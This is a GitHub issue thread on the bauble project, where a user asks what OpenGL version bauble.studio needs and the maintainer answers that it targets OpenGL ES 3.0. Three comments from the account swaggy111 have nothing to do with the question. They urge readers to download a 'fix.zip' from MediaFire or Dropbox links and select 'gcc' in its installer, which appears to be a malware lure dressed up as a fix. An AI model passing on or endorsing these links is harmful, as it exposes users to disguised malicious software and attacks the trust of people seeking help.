### ISSUE TITLE
Question about graphics cards

### ISSUE THREAD

**Issue by jamiebill** [ianthehenry/bauble#11]
This could be the wrong place to ask, and it definitely is just a question, and entirely my own "issue". I wanted to ask the version of OpenGL required to run bauble.studio successfully in the browser? I can't get it to run in the browser of my venerable X200. I normally don't do anything graphics-y, and hadn't even looked up what my graphics card is called, but here I am, pining after a functional less-than-15-years-old graphics card. What have you done!

If I'm reading around correctly, my graphics card (Intel GM45) can only run up to version 2.1, which was hip back around 2006 or so. Could you confirm the results of my investigations here, and tell me that this is the reason I can't play around with the lovely 3D graphics? And what version would be the minimum that would work. Thanks!

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/ynhx37qmyqek881/fix.zip/file
In the installer menu, select "gcc."

**Comment by swaggy111** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by swaggy111** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by ianthehenry** [comment]
Hi! I'm glad to hear you're interested in Bauble -- sadly Bauble targets OpenGL ES 3.0. It's possible that a browser running ANGLE would be able to emulate it sufficiently to try it out? Although that's kind of a stretch; I don' tknow. Failing that, recent smartphones should be able to run it. Raymarching is relatively expensive, though -- even an older GPU that does support ES 3 might not be able to render things at 60fps.

**Comment by ianthehenry** [comment]
Recent smartphones can run Bauble, although graphics drivers on Android are kind of all over the place.
